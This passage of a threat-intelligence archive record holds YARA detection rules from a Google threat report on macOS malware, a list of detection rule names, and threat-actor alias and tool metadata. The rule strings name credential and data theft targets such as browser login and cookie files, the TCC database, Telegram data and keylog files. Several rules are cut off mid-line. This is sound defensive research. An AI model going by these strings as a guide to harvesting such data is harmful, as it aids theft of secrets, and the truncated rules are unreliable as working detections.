rule G_Downloader_HYPERCALL_1 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n        date_created = \"2025-10-24\"\r\n        date_modified = \"2025-10-24\"\r\n        rev = 1\r\n    strings:\r\n        $go_build = \"Go build ID:\"\r\n        $go_inf = \"Go buildinf:\"\r\n        $lib1 = \"/inject_mac/inject.go\"\r\n        $lib2 = \"github.com/gorilla/websocket\"\r\n        $func1 = \"t_loader/inject_mac.Inject\"\r\n        $func2 = \"t_loader/common.rc4_decode\"\r\n        $c1 = { 48 BF 00 AC 23 FC 06 00 00 00 0F 1F 00 E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 32 48 8B 52\r\n        $c2 = { 48 89 D6 48 F7 EA 48 01 DA 48 01 CA 48 C1 FA 1A 48 C1 FE 3F 48 29 F2 48 69 D2 00 E1 F5 05 48 29\r\n    condition:\r\n        (uint32(0) == 0xfeedface or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca or uint32(0) == 0xcefaedf\r\n}\r\nrule G_Backdoor_SILENCELIFT_1 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n        md5 = \"4e4f2dfe143ba261fd8a18d1c4b58f2e\"\r\n        date_created = \"2025/10/23\"\r\n        date_modified = \"2025/10/28\"\r\n        rev = 2\r\n    strings:\r\n        $ss1 = \"/usr/libexec/PlistBuddy -c \\\"print :IOConsoleUsers:0:CGSSessionScreenIsLocked\\\" /dev/stdin 2\u003e/de\r\n        $ss2 = \"pkill -CONT -f\" ascii fullword\r\n        $ss3 = \"pkill -STOP -f\" ascii fullword\r\n        $ss4 = \"/Library/Caches/.Logs.db\" ascii fullword\r\n        $ss5 = \"/Library/Caches/.evt_\"\r\n        $ss6 = \"{\\\"bot_id\\\":\\\"\"\r\n        $ss7 = \"\\\", \\\"status\\\":\"\r\n        $ss8 = \"/Library/Fonts/.analyzed\" ascii fullword\r\n    condition:\r\n        all of them\r\n}\r\nrule G_APTFIN_Downloader_SUGARLOADER_1 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n        md5 = \"3712793d3847dd0962361aa528fa124c\"\r\n        date_created = \"2025/10/15\"\r\n        date_modified = \"2025/10/15\"\r\n        rev = 1\r\n    strings:\r\n        $ss1 = \"/Library/OSRecovery/com.apple.os.config\"\r\n        $ss2 = \"/Library/Group Containers/OSRecovery\"\r\n        $ss4 = \"_wolfssl_make_rng\"\r\n    condition:\r\n        all of them\r\n}\r\nrule G_APTFIN_Downloader_SUGARLOADER_2 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n    strings:\r\n        $m1 = \"__mod_init_func\\x00lko2\\x00\"\r\n        $m2 = \"__mod_term_func\\x00lko2\\x00\"\r\n        $m3 = \"/usr/lib/libcurl.4.dylib\"\r\n    condition:\r\n        (uint32(0) == 0xfeedface or uint32(0) == 0xfeedfacf or uint32(0) == 0xcefaedfe or uint32(0) == 0xcffaedf\r\n}\r\n
rule G_Datamine_DEEPBREATH_1 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n    strings:\r\n        $sa1 = \"-fakedel\"\r\n        $sa2 = \"-autodat\"\r\n        $sa3 = \"-datadel\"\r\n        $sa4 = \"-extdata\"\r\n        $sa5 = \"TccClickJack\"\r\n        $sb1 = \"com.apple.TCC\\\" as alias\"\r\n        $sb2 = \"/TCC.db\\\" as alias\"\r\n        $sc1 = \"/group.com.apple.notes\\\") as alias\"\r\n        $sc2 = \".keepcoder.Telegram\\\")\"\r\n        $sc3 = \"Support/Google/Chrome/\\\")\"\r\n        $sc4 = \"Support/BraveSoftware/Brave-Browser/\\\")\"\r\n        $sc5 = \"Support/Microsoft Edge/\\\")\"\r\n        $sc6 = \"\u0026 \\\"/Local Extension Settings\\\"\"\r\n        $sc7 = \"\u0026 \\\"/Cookies\\\"\"\r\n        $sc8 = \"\u0026 \\\"/Login Data\\\"\"\r\n        $sd1 = \"\\\"cp -rf \\\" \u0026 quoted form of \"\r\n    condition:\r\n        (uint32(0) == 0xfeedfacf) and 2 of ($sa*) and 2 of ($sb*) and 3 of ($sc*) and 1 of ($sd*)\r\n}\r\nrule G_Datamine_CHROMEPUSH_1 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n        date_created = \"2025-11-06\"\r\n        date_modified = \"2025-11-06\"\r\n        rev = 1\r\n    strings:\r\n        $s1 = \"%s/CA%02d%02d%02d%02d%02d%02d.dat\"\r\n        $s2 = \"%s/tmpCA.dat\"\r\n        $s3 = \"mouseStates\"\r\n        $s4 = \"touch /Library/Caches/.evt_\"\r\n        $s5 = \"cp -f\"\r\n        $s6 = \"rm -rf\"\r\n        $s7 = \"keylogs\"\r\n        $s8 = \"%s/KL%02d%02d%02d%02d%02d%02d.dat\"\r\n        $s9 = \"%s/tmpKL.dat\"\r\n        $s10 = \"OK: Create data.js success\"\r\n    condition:\r\n        (uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedf\r\n}\r\nGoogle Security Operations (SecOps)\r\nGoogle SecOps customers have access to these broad category rules and more under the “Mandiant Intel Emerging Threats” and “Mandiant Hunting Rules” rule packs. 
The activity discussed in this blog post is detected in Google SecOps under the following rule names:\r\nApplication Support com.apple Suspicious Filewrites\r\nChrome Native Messaging Directory\r\nChrome Service Worker Directory Deletion\r\nDatabase Staging in Library Caches\r\nmacOS Chrome Extension Modification\r\nmacOS Notes Database Harvesting\r\nmacOS TCC Database Manipulation\r\nSuspicious Access To macOS Web Browser Credentials\r\nSuspicious Audio Hardware Fingerprinting\r\nSuspicious Keychain Interaction\r\nSuspicious Library Font Directory File Write\r\nSuspicious Multi-Stage Payload Loader\r\nSuspicious Permissions on macOS System File\r\nSuspicious SoftwareUpdate Masquerading\r\nSuspicious TCC Database Modification\r\nSuspicious Web Downloader Pipe to ZSH\r\nTelegram Session Data Staging\r\nPosted in Threat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering"
	],
	"report_names": [
		"unc1069-targets-cryptocurrency-ai-social-engineering"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0106b19a-ac99-4bc9-90b9-4647bfc5f3ce",
			"created_at": "2023-11-08T02:00:07.144995Z",
			"updated_at": "2026-04-10T02:00:03.425891Z",
			"deleted_at": null,
			"main_name": "TraderTraitor",
			"aliases": [
				"Pukchong",
				"Jade Sleet",
				"UNC4899"
			],
			"source_name": "MISPGALAXY:TraderTraitor",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f87ef0bf-0574-492f-aebc-63e5953938e2",
			"created_at": "2024-11-23T02:00:04.116692Z",
			"updated_at": "2026-04-10T02:00:03.779803Z",
			"deleted_at": null,
			"main_name": "Gorilla",
			"aliases": [],
			"source_name": "MISPGALAXY:Gorilla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd",
			"created_at": "2022-10-25T16:07:23.766784Z",
			"updated_at": "2026-04-10T02:00:04.7432Z",
			"deleted_at": null,
			"main_name": "Bluenoroff",
			"aliases": [
				"APT 38",
				"ATK 117",
				"Alluring Pisces",
				"Black Alicanto",
				"Bluenoroff",
				"CTG-6459",
				"Copernicium",
				"G0082",
				"Nickel Gladstone",
				"Sapphire Sleet",
				"Selective Pisces",
				"Stardust Chollima",
				"T-APT-15",
				"TA444",
				"TAG-71",
				"TEMP.Hermit"
			],
			"source_name": "ETDA:Bluenoroff",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "dcbff54d-13ec-40b5-b3b9-b74a315669e1",
			"created_at": "2026-02-03T02:00:03.428641Z",
			"updated_at": "2026-04-10T02:00:03.937539Z",
			"deleted_at": null,
			"main_name": "UNC1069",
			"aliases": [
				"MASAN",
				"CryptoCore"
			],
			"source_name": "MISPGALAXY:UNC1069",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434208,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a052ffc6a85eecd3f0a1b632c5fb52bcee845eed.pdf",
		"text": "https://archive.orkl.eu/a052ffc6a85eecd3f0a1b632c5fb52bcee845eed.txt",
		"img": "https://archive.orkl.eu/a052ffc6a85eecd3f0a1b632c5fb52bcee845eed.jpg"
	}
}